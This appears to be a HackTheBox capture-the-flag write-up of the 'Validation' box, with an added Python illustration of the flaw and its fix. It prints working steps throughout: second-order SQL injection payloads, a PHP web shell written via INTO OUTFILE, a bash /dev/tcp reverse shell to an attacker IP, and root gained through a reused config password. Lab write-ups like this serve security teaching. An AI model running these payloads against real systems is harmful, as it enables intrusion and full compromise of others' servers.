title: HackTheBox-Validation-SQLi
author: Mosaic Theory
layout: true
categories: Vulnerability Labs
tags:
- Box-Pwning Diary
Stars are bright everywhere, depending on whether you look up to see them.
HackTheBox-Validation
Recon:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 01:08:15 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4566/tcp on 10.10.11.116
Discovered open port 80/tcp on 10.10.11.116
Discovered open port 22/tcp on 10.10.11.116
Discovered open port 8080/tcp on 10.10.11.116
Nmap scan report for 10.10.11.116
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
4566/tcp open http nginx
|_http-title: 403 Forbidden
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds
A registration page:
After adding a user, the name is echoed back on the page:
If different usernames are added for the same country, those are echoed as well:
>> dirsearch -u http://validation.htb/ -e php
Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940
[09:18:48] 403 - 279B - /.htpasswds
[09:18:48] 403 - 279B - /.httr-oauth
[09:18:49] 403 - 279B - /.htpasswd_test
[09:19:01] 200 - 16B - /account.php
[09:19:14] 200 - 0B - /config.php
[09:19:17] 301 - 314B - /css -> http://validation.htb/css/
[09:19:25] 200 - 16KB - /index.php
[09:19:25] 200 - 16KB - /index.php/login/
[09:19:26] 403 - 279B - /js/
[09:19:26] 301 - 313B - /js -> http://validation.htb/js/
config.php returns nothing readable; login is the same as index, just without the styling.
POST / HTTP/1.1
Host: validation.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://validation.htb
DNT: 1
Connection: close
Referer: http://validation.htb/
Cookie: user=ca28b722bc10aa4b3beb941d5ca220ca
Upgrade-Insecure-Requests: 1
username=admin&country=Brazil
SQLi:
No matter how the parameters are changed, the server always responds with a Set-Cookie. Appending a single quote to the country still returns a cookie, but when that cookie is then used to load account.php, the server returns an error:
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome 21232f297a57a5a743894a0e4a801fc3'</h1><h3 class="text-white">Other Players In Brazil'</h3><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b> on line <b>33
To verify this guess, I added a comment after the single quote:
>> curl -v -d "username=hack&country=Brazil'-- -" http://validation.htb
* Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:49:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host validation.htb left intact
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
* Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> GET /account.php HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Tue, 17 May 2022 01:50:54 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Vary: Accept-Encoding
< Content-Length: 762
< Content-Type: text/html; charset=UTF-8
<
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>admin</li> </div>
</section>
</div>
* Connection #0 to host validation.htb left intact
This time there is no error; this looks like a second-order injection:
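The second-order pattern described here, as an added illustration that is not part of the original writeup: a constructed sqlite3 stand-in for the registration database in which the registration INSERT is parameterised (so a quote in the country is stored without complaint) while the account page concatenates the stored country into its query. The table name, column names and sample players are assumptions.

```python
import sqlite3

# Constructed stand-in for the box's "registration" database; table name,
# column names and the sample players are assumptions, not the real schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE players (username TEXT, country TEXT)")
    conn.executemany(
        "INSERT INTO players VALUES (?, ?)",
        [("mosaic", "Brazil"), ("mosaicd", "Brazil"),
         ("admin", "Brazil"), ("bob", "Belgium")],
    )
    return conn

def register(conn, username, country):
    # Registration (the POST to /) is parameterised: a quote in `country`
    # is stored faithfully and nothing fails. That is what makes the bug
    # second-order: the value is accepted now and only breaks the query
    # when account.php reads it back.
    conn.execute("INSERT INTO players VALUES (?, ?)", (username, country))
    row = conn.execute("SELECT country FROM players WHERE username = ?",
                       (username,)).fetchone()
    return row[0]

def other_players_vulnerable(conn, country):
    # Mirrors the account page: the stored country is concatenated into SQL.
    sql = f"SELECT username FROM players WHERE country = '{country}'"
    try:
        return sorted(row[0] for row in conn.execute(sql))
    except sqlite3.OperationalError:
        # A lone quote breaks the statement: the analogue of mysqli_query()
        # returning false and the "fetch_assoc() on bool" fatal error.
        return None

def other_players_fixed(conn, country):
    # Same lookup with a bound parameter: the stored value is data only,
    # whatever characters it contains.
    sql = "SELECT username FROM players WHERE country = ?"
    return sorted(row[0] for row in conn.execute(sql, (country,)))

def demo():
    conn = make_db()
    stored = register(conn, "hack", "Brazil'-- ")
    # Vulnerable: the comment swallows the closing quote, the query becomes
    # WHERE country = 'Brazil' and every Brazil player is listed.
    # Fixed: only "hack" has the literal country "Brazil'-- ".
    return other_players_vulnerable(conn, stored), other_players_fixed(conn, stored)
```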
>> curl -v -d "username=hack&country=Brazil'union select 1--+" http://validation.htb
* Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 46
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:55:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host validation.htb left intact
>> curl -v --cookie "user=21232f297a57a5a743894a0e4a801fc3" http://validation.htb/account.php
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome admin</h1><h3 class="text-white">Other Players In Belgium' union select 1-- -</h3><li class='text-white'>1</li></div>
</section>
</div>
* Connection #0 to host validation.htb left intact
The result is echoed back.
>> curl -v -d "username=hack&country=Brazil'union select user()--+" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select user()-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>uhc@localhost</li> </div>
</section>
</div>
Current database user obtained: uhc@localhost.
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select database()-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>registration</li> </div>
</section>
</div>
* Connection #0 to host validation.htb left intact
Current database: registration.
>> curl -v -d "username=hack&country=Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -</h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>SELECT</li><li class='text-white'>INSERT</li><li class='text-white'>UPDATE</li><li class='text-white'>DELETE</li><li class='text-white'>CREATE</li><li class='text-white'>DROP</li><li class='text-white'>RELOAD</li><li class='text-white'>SHUTDOWN</li><li class='text-white'>PROCESS</li><li class='text-white'>FILE</li><li class='text-white'>REFERENCES</li><li class='text-white'>INDEX</li><li class='text-white'>ALTER</li><li class='text-white'>SHOW DATABASES</li><li class='text-white'>SUPER</li><li class='text-white'>CREATE TEMPORARY TABLES</li><li class='text-white'>LOCK TABLES</li><li class='text-white'>EXECUTE</li><li class='text-white'>REPLICATION SLAVE</li><li class='text-white'>BINLOG MONITOR</li><li class='text-white'>CREATE VIEW</li><li class='text-white'>SHOW VIEW</li><li class='text-white'>CREATE ROUTINE</li><li class='text-white'>ALTER ROUTINE</li><li class='text-white'>CREATE USER</li><li class='text-white'>EVENT</li><li class='text-white'>TRIGGER</li><li class='text-white'>CREATE TABLESPACE</li><li class='text-white'>DELETE HISTORY</li><li class='text-white'>SET USER</li><li class='text-white'>FEDERATED ADMIN</li><li class='text-white'>CONNECTION ADMIN</li><li class='text-white'>READ_ONLY ADMIN</li><li class='text-white'>REPLICATION SLAVE ADMIN</li><li class='text-white'>REPLICATION MASTER ADMIN</li><li class='text-white'>BINLOG ADMIN</li><li class='text-white'>BINLOG REPLAY</li><li class='text-white'>SLAVE MONITOR</li> </div>
</section>
</div>
* Connection #0 to host validation.htb left intact
My current user has a lot of privileges, including FILE:
>> curl -v -d "username=hack&country=Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - " http://validation.htb/
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - </h3><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b> on line <b>33</b><br />
* Connection #0 to host validation.htb left intact
>> curl http://validation.htb/test.txt
can you see me ?
I can write a web shell; too many special characters cause errors, so the payload is URL-encoded:
>> curl -v -d "username=hack&country=Belgium' union select %22%3C%3Fphp%20SYSTEM(%24_REQUEST%5B%27cmd%27%5D)%3B%20%3F%3E%22%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fshell.php%27%3B--%20-" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
>> curl http://validation.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reverse shell:
>> curl http://validation.htb/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.7/9001 0>&1"'
>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.116] 40708
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@validation:/var/www/html$
script /dev/null -c bash
^Z
stty raw -echo; fg
reset
screen
The user's home directory is readable:
www-data@validation:/var/www/html$ ls
account.php config.php css index.php js shell.php
www-data@validation:/var/www/html$ cd ~
www-data@validation:/var/www$ ls
html
www-data@validation:/var/www$ cd /
www-data@validation:/$ cd home/
www-data@validation:/home$ ls
htb
www-data@validation:/home$ cd htb/
www-data@validation:/home/htb$ ls
user.txt
www-data@validation:/home/htb$ cat user.txt
07..................................
The config file contains a password. The uhc user is reported as not existing, but reusing the same password for root succeeds:
www-data@validation:/var/www/html$ ls
account.php config.php css index.php js
www-data@validation:/var/www/html$ cat config.php
<?php
$servername = "127.0.0.1";
$username = "uhc";
$password = "uhc-9qual-global-pw";
$dbname = "registration";
$conn = new mysqli($servername, $username, $password, $dbname);
?>
www-data@validation:/var/www/html$ su uhc
su: user uhc does not exist or the user entry does not contain all the required fields
www-data@validation:/var/www/html$ su -
Password:
root@validation:~# cat /root/root.txt
7a..................................
Originally published on the WeChat public account 老鑫安全: HackTheBox-Validation